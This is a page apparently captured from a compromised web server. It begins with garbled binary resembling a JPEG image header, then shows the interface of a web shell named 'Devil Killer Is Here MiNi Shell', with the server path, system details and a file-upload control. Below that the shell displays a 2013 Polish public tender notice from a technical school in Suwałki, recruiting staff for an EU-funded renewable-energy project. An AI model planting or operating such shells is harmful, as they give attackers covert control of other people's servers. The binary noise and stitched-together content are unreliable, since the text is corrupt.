JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/268546-N-2013.html

<p class="kh_header"><b>Suwałki: 1.	Przedmiotem zamówienia jest wybór kadry do realizacji projektu pn. PWP Energia odnawialna szansą Suwalszczyzny realizowanego przez Zespół Szkół Technicznych jako Partnera Projektu w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach</b><br>
<b>Numer ogłoszenia: 268546 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Technicznych , ul. Sejneńska 33, 16-400 Suwałki, woj. podlaskie, tel. 0-87 565 36 30, faks 0-87 565 36 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zst.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła ponadgimnazjalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.	Przedmiotem zamówienia jest wybór kadry do realizacji projektu pn. PWP Energia odnawialna szansą Suwalszczyzny realizowanego przez Zespół Szkół Technicznych jako Partnera Projektu w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Przedmiot zamówienia obejmuje 3 części:

2.1.	Część 1. Szkolny specjalista ds. wdrażania projektu 

2.1.1.	wykonanie usługi w okresie od dnia podpisania umowy do 30.06.2015 r. w wymiarze   1350 godzin łącznie

2.1.2.	Do obowiązków szkolnego specjalisty ds. wdrażania projektu będzie należało m.in.:
1)	Kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie                             z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz przepisami krajowymi i Unii Europejskiej.
2)	Nadzór nad całością prac związanych z realizacją projektu i ich jakością.
3)	Koordynacja prac zespołu projektowego i podejmowanie decyzji organizacyjnych.
4)	Praca w Grupie Sterującej.
5)	Przygotowanie niezbędnej dokumentacji projektowej po  stronie szkoły, regulaminów  i innych wzorów dokumentów wykorzystywanych w trakcie realizacji projektu.
6)	Nadzór nad prawidłowością  przebiegu procesów formalnych związanych z realizacją projektu.
7)	Czynna współpraca z liderem projektu, partnerami, dyrekcją szkoły oraz instytucją pośredniczącą.
8)	Nadzór nad promocją projektu.
9)	Opracowanie i prowadzenie dokumentacji rekrutacyjnej, zorganizowanie i przeprowadzenie procesu rekrutacji.
10)	Opracowanie  harmonogramu zajęć pozalekcyjnych dla uczestników projektu.
11)	Reagowanie w okolicznościach wymagających zmiany harmonogramu realizacji zajęć pozalekcyjnych                    w tym zmiany mające wpływ na zakres, cele czy rezultaty projektu.
12)	Ścisła współpraca ze Specjalistą ds. logistyki oraz Inżynierem ds. szkolnego laboratorium  OZE.
13)	Odpowiedzialność za  archiwizację dokumentów.
14)	Prowadzenie monitoringu projektu.
15)	Ewaluacja realizacji projektu po stronie szkoły.
16)	Podejmowania decyzji finansowych i kadrowych na poziomie realizacji zadań w szkole.
17)	Nadzór nad realizacją budżetu, celowością zakupów, w tym wydatkowaniem środków finansowych                 po stronie szkoły.
18)	Sporządzanie w zakresie merytorycznym wniosków o płatność w Generatorze Wniosków Płatniczych.
19)	Nadzór nad prawidłowością udzielania zamówień publicznych.
20)	Przedkładanie do zatwierdzenia dokumentacji związanej z udzieleniem zamówienia publicznego.
21)	Prowadzenie rejestru zamówień publicznych w projekcie.              
22)	Dbałość o zapewnienie właściwego przepływu informacji oraz koordynowanie obiegu dokumentów.
23)	Prowadzenie dokumentacji i korespondencji związanej z realizacją powierzonych zadań w sposób przejrzysty, czytelny i estetyczny.
24) Dbałość o  rzetelną komunikację pomiędzy partnerami projektu (rozsyłanie aktualnych komunikatów 
      dotyczących realizacji projektu).                                                                                                                            25) Nadzór nad prawidłowym przebiegiem praktyk zawodowych i/lub staży.                                                              26) Monitoring i ewaluacja przebiegu praktyk zawodowych i/lub staży.
27) Dbałość o poprawność merytoryczną  materiałów dydaktycznych.
28) Odpowiedzialność za organizację pracy  biura projektu.
29) Systematyczne informowanie dyrektora szkoły o przebiegu i realizacji zaplanowanych przedsięwzięć     projektowych.
 30) Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji    projektu.
31) Wymagana dyspozycyjność w siedzibie jednostki realizującej projekt w godzinach realizowanych projektowych zajęć dydaktycznych dla uczniów.
2.1.3. Wymagania: 
1)	doświadczenie związane z realizacją projektów finansowanych ze środków UE i zewnętrznych
2)	znajomość zasad realizowania i rozliczania projektów unijnych,
3)	znajomość specyfiki szkolnictwa zawodowego,
4)	praktyczna znajomość Ustawy prawo zamówień publicznych ,
5)	znajomość dokumentów programowych POKL EFS;
6)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
7)	niekaralność,
8)	odpowiedzialność, dokładność i terminowość wykonywania powierzonych zadań
9)	umiejętność pracy w zespole, sumienność i rzetelność, dobra organizacja czasu pracy;
10)	biegła znajomość komputera w zakresie MS Word, MS Excel, Internet;

2.1.4.	Szkolny specjalista ds. wdrażania projektu  zobowiązany będzie wykonywać przedmiot niniejszego zamówienia:
1)	w Biurze Projektu zlokalizowanym w siedzibie Zamawiającego;
2)	w każdy dzień nauki szkolnej co najmniej w godzinach od 1100 do 1400, w których to godzinach Biuro Projektu będzie czynne również dla uczniów biorących udział w projekcie; 
3)	przynajmniej trzy razy w tygodniu w okresie wakacji przez 2 godziny dziennie w dniach i godzinach ustalonych i uzgodnionych z dyrektorem szkoły.

2.2.	Cześć II - Specjalista ds. logistyki 

2.2.1. wykonanie usługi w okresie od dnia podpisania umowy do 30.06.2015 r.  w wymiarze 1080 godzin łącznie.

2.2.2. Do obowiązków Specjalisty ds. logistyki będzie należało m.in.:
1)	Wsparcie  Szkolnego  specjalisty ds. wdrażania projektu w zakresie: rekrutacji uczestników projektu, 
przygotowania dokumentacji projektowej oraz harmonogramu zajęć pozalekcyjnych.
2)	Planowanie i podejmowanie działań logistycznych i wywiązywanie się ze wskaźników.
3)	Kontakty z pracodawcami w sprawie organizacji praktyk krajowych i staży uczniowskich.
4)	Opracowanie harmonogramu praktyk krajowych oraz staży uczniowskich.
5)	Organizacja  wizyt studyjnych w kraju oraz ich nadzór.
6)	Reagowanie w okolicznościach wymagających zmiany harmonogramu realizacji praktyk i staży uczniowskich w tym zmiany mające wpływ na zakres, cele czy rezultaty projektu.
7)	Prowadzenie sprawozdawczości w systemie PEFS.
8)	Przeprowadzanie zamówień  publicznych w związku z realizacją projektu po stronie szkoły.
9)	Uzyskiwanie pozwoleń instytucji finansujących i nadzorujących pracę szkoły niezbędnych do realizacji zadań projektowych.
10)	Współpraca z potencjalnymi kontrahentami w ramach realizacji  zadań.
11)	Prowadzenie dokumentacji i korespondencji związanej z realizacją powierzonych zadań w sposób przejrzysty, czytelny i estetyczny.
12)	Rzetelne wypełnianie dokumentacji związanej z realizacją projektu.
13)	Ścisła współpraca ze Specjalistą ds. wdrażania projektu w celu zapewnienia prawidłowej realizacji zadań. 
14)	Współpraca z zespołem projektowym w celu realizacji planowanych działań i osiągnięcia zamierzonych rezultatów.
15)	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji    projektu.
16)	Wymagana dyspozycyjność w siedzibie jednostki realizującej projekt w godzinach realizowanych projektowych zajęć dydaktycznych dla uczniów.

2.2.3. Wymagania: 
1)	znajomość środowiska szkoły specyfiki szkolnictwa zawodowego,
2)	praktyczna znajomość ustawy Prawo zamówień publicznych ,
3)	znajomość zasad realizowania i rozliczania projektów unijnych,
4)	znajomość dokumentów programowych POKL EFS;
5)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
6)	niekaralność,
7)	odpowiedzialność, dokładność i terminowość wykonywania powierzonych zadań
8)	umiejętność pracy w zespole, sumienność i rzetelność, dobra organizacja czasu pracy;
9)	biegła znajomość komputera w zakresie MS Word, MS Excel, Internet;

2.2.4.	 Specjalista ds. logistyki   zobowiązany będzie wykonywać przedmiot niniejszego zamówienia:
1)	w Biurze Projektu zlokalizowanym w siedzibie Zamawiającego
2)	w każdy dzień nauki szkolnej co najmniej w godzinach od 1200 do 1400, w których to godzinach Biuro Projektu będzie czynne również dla uczniów biorących udział w projekcie, 
3)	przynajmniej trzy razy w tygodniu w okresie wakacji przez 2 godziny dziennie w dniach i godzinach ustalonych i uzgodnionych z dyrektorem szkoły.

2.3.	Część III - Inżynier ds. szkolnego laboratorium 

2.3.1.	wykonanie usługi w okresie od dnia podpisania umowy do 30.06.2015 r.   w wymiarze 1350 godzin łącznie.

2.3.2. Do obowiązków Inżyniera ds. szkolnego laboratorium OZE będzie należało:
1)	Współpraca przy opracowaniu dokumentacji przetargowej na wyposażenie Szkolnego Laboratorium OZE, w tym generacji wiatrowej i solarnej.
2)	Współpraca z wykonawcą przy projektowaniu laboratorium generacji wiatrowej.
3)	Współpraca z wykonawcą przy projektowaniu laboratorium generacji solarnej.
4)	Koordynacja działań wykonawczych oraz nadzór techniczny nad budową Szkolnego Laboratorium OZE, w tym generacji wiatrowej i solarnej.
5)	Opracowanie dokumentacji powykonawczej Szkolnego Laboratorium OZE.
6)	Bieżąca współpraca z nauczycielami przedmiotów zawodowych i instruktorami kształcenia praktycznego w odniesieniu do potrzeb kształcenia w zakresie technologii OZE.
7)	Nadzór nad pracą związaną z opracowaniem metodyk szkoleniowych Szkolnego Laboratorium OZE.
8)	Nadzór nad pracą związaną z opracowaniem instruktarzy stanowiskowych Szkolnego Laboratorium OZE.
9)	Współudział w opracowaniu instrukcji laboratoryjnych do zajęć realizowanych w laboratorium OZE przez agendy tematyczne.
10)	Nadzór nad zakupami związanymi z wyposażeniem Szkolnego Laboratorium OZE.
11)	Współpraca przy realizacji zamówień publicznych.
12)	Wykonywanie drobnych napraw oraz prac konserwacyjnych w szkolnym laboratorium OZE,                             w tym generacji wiatrowej i solarnej.
13)	Przeszkolenie pracowników ZST w zakresie obsługi urządzeń znajdujących się w laboratorium OZE.
14)	Systematyczna współpraca ze Szkolnym specjalistą ds. wdrażania projektu oraz ze Specjalistą ds. logistyki w celu zapewnienia prawidłowego przepływu informacji.
15)	Współpraca z zespołem projektowym w celu realizacji planowanych działań i osiągnięcia zamierzonych rezultatów.
16)	Aktywne uczestnictwo i współpraca w działaniach Partnerstwa mających na celu prawidłową realizację Projektu.
17) Prowadzenie dokumentacji i korespondencji związanej z realizacją powierzonych zadań.
              18) Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji   projektu.
19) Wymagana dyspozycyjność w siedzibie jednostki realizującej projekt w godzinach realizowanych projektowych zajęć  dydaktycznych dla uczniów.

	2.3.3. Wymagania:
1)	wykształcenie wyższe inżynierskie z przygotowaniem pedagogicznym,
2)	znajomość środowiska szkoły, specyfiki szkolnictwa zawodowego,
3)	praktyczna znajomość ustawy Prawo zamówień publicznych,
4)	znajomość zasad realizowania projektów unijnych,
5)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
6)	niekaralność,
7)	odpowiedzialność, dokładność i terminowość wykonywania powierzonych zadań
8)	umiejętność pracy w zespole, sumienność i rzetelność, dobra organizacja czasu pracy;
9)	biegła znajomość komputera w zakresie MS Word, MS Excel, Internet;

2.3.4.	Inżynier ds. szkolnego laboratorium zobowiązany będzie wykonywać przedmiot niniejszego zamówienia:
1)	w Biurze Projektu zlokalizowanym w siedzibie Zamawiającego
2)	w każdy dzień nauki szkolnej co najmniej w godzinach od 11 do 14, w których to godzinach Biuro Projektu będzie czynne również dla uczniów biorących udział w projekcie, 
3)	przynajmniej trzy razy w tygodniu w okresie wakacji przez 2 godziny dziennie w dniach i godzinach ustalonych i uzgodnionych z dyrektorem szkoły.

3.	Przedmiot zamówienia związany jest z realizacją  przez Zespół Szkół Technicznych w Suwałkach projektu p.n. PWP ENERGIA ODNAWIALNA SZANSĄ SUWALSZCZYZNY dofinansowanego z Programu Operacyjnego Kapitał Ludzki, Działania 9.2. Podniesienie atrakcyjności i jakości kształcenia zawodowego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmianę umowy:
1)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zmówienia,
2)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności instytucjami Zarządzającą, Pośredniczącą I i II stopnia, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpłynąć na realizację zamówienia,
3)	gdy konieczność wprowadzenia zmian będzie następstwem wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia,  w szczególności w zakresie sprawozdawczości,
4)	gdy wystąpią obiektywne przeszkody umożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zst.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Technicznych
16-400 Suwałki
ul. Sejneńska 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 12:00, miejsce: Zespół Szkół Technicznych
16-400 Suwałki
ul. Sejneńska 33
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolny specjalista ds. wdrażania projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1.1.	wykonanie usługi w okresie od dnia podpisania umowy do 30.06.2015 r. w wymiarze   1350 godzin łącznie

2.1.2.	Do obowiązków szkolnego specjalisty ds. wdrażania projektu będzie należało m.in.:
1)	Kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie                             z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz przepisami krajowymi i Unii Europejskiej.
2)	Nadzór nad całością prac związanych z realizacją projektu i ich jakością.
3)	Koordynacja prac zespołu projektowego i podejmowanie decyzji organizacyjnych.
4)	Praca w Grupie Sterującej.
5)	Przygotowanie niezbędnej dokumentacji projektowej po  stronie szkoły, regulaminów  i innych wzorów dokumentów wykorzystywanych w trakcie realizacji projektu.
6)	Nadzór nad prawidłowością  przebiegu procesów formalnych związanych z realizacją projektu.
7)	Czynna współpraca z liderem projektu, partnerami, dyrekcją szkoły oraz instytucją pośredniczącą.
8)	Nadzór nad promocją projektu.
9)	Opracowanie i prowadzenie dokumentacji rekrutacyjnej, zorganizowanie i przeprowadzenie procesu rekrutacji.
10)	Opracowanie  harmonogramu zajęć pozalekcyjnych dla uczestników projektu.
11)	Reagowanie w okolicznościach wymagających zmiany harmonogramu realizacji zajęć pozalekcyjnych                    w tym zmiany mające wpływ na zakres, cele czy rezultaty projektu.
12)	Ścisła współpraca ze Specjalistą ds. logistyki oraz Inżynierem ds. szkolnego laboratorium  OZE.
13)	Odpowiedzialność za  archiwizację dokumentów.
14)	Prowadzenie monitoringu projektu.
15)	Ewaluacja realizacji projektu po stronie szkoły.
16)	Podejmowania decyzji finansowych i kadrowych na poziomie realizacji zadań w szkole.
17)	Nadzór nad realizacją budżetu, celowością zakupów, w tym wydatkowaniem środków finansowych                 po stronie szkoły.
18)	Sporządzanie w zakresie merytorycznym wniosków o płatność w Generatorze Wniosków Płatniczych.
19)	Nadzór nad prawidłowością udzielania zamówień publicznych.
20)	Przedkładanie do zatwierdzenia dokumentacji związanej z udzieleniem zamówienia publicznego.
21)	Prowadzenie rejestru zamówień publicznych w projekcie.              
22)	Dbałość o zapewnienie właściwego przepływu informacji oraz koordynowanie obiegu dokumentów.
23)	Prowadzenie dokumentacji i korespondencji związanej z realizacją powierzonych zadań w sposób przejrzysty, czytelny i estetyczny.
24) Dbałość o  rzetelną komunikację pomiędzy partnerami projektu (rozsyłanie aktualnych komunikatów 
      dotyczących realizacji projektu).                                                                                                                            25) Nadzór nad prawidłowym przebiegiem praktyk zawodowych i/lub staży.                                                              26) Monitoring i ewaluacja przebiegu praktyk zawodowych i/lub staży.
27) Dbałość o poprawność merytoryczną  materiałów dydaktycznych.
28) Odpowiedzialność za organizację pracy  biura projektu.
29) Systematyczne informowanie dyrektora szkoły o przebiegu i realizacji zaplanowanych przedsięwzięć     projektowych.
 30) Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji    projektu.
31) Wymagana dyspozycyjność w siedzibie jednostki realizującej projekt w godzinach realizowanych projektowych zajęć dydaktycznych dla uczniów.
2.1.3. Wymagania: 
1)	doświadczenie związane z realizacją projektów finansowanych ze środków UE i zewnętrznych
2)	znajomość zasad realizowania i rozliczania projektów unijnych,
3)	znajomość specyfiki szkolnictwa zawodowego,
4)	praktyczna znajomość Ustawy prawo zamówień publicznych ,
5)	znajomość dokumentów programowych POKL EFS;
6)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
7)	niekaralność,
8)	odpowiedzialność, dokładność i terminowość wykonywania powierzonych zadań
9)	umiejętność pracy w zespole, sumienność i rzetelność, dobra organizacja czasu pracy;
10)	biegła znajomość komputera w zakresie MS Word, MS Excel, Internet;

2.1.4.	Szkolny specjalista ds. wdrażania projektu  zobowiązany będzie wykonywać przedmiot niniejszego zamówienia:
1)	w Biurze Projektu zlokalizowanym w siedzibie Zamawiającego;
2)	w każdy dzień nauki szkolnej co najmniej w godzinach od 1100 do 1400, w których to godzinach Biuro Projektu będzie czynne również dla uczniów biorących udział w projekcie; 
3)	przynajmniej trzy razy w tygodniu w okresie wakacji przez 2 godziny dziennie w dniach i godzinach ustalonych i uzgodnionych z dyrektorem szkoły.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
